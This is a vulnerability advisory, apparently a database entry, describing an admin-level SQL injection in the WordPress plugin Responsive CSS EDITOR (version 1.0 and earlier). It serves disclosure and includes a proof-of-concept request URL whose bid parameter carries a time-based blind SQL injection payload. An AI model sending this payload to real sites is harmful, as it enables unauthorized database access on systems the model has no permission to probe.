WordPress Plugin Vulnerabilities
Responsive CSS EDITOR <= 1.0 - Admin+ SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admin.
Proof of Concept
1. Send a request with the payload: /wp-admin/admin.php?page=responsive_css_editor_setting&updateorder=false&deletebreakpoints=true&bid=(select*from(select(sleep(5)))a) 2. See SQLi
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chien Vuong
Submitter
Chien Vuong
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-06-05 (about 11 months ago)
Added
2023-06-05 (about 11 months ago)
Last Updated
2023-06-05 (about 11 months ago)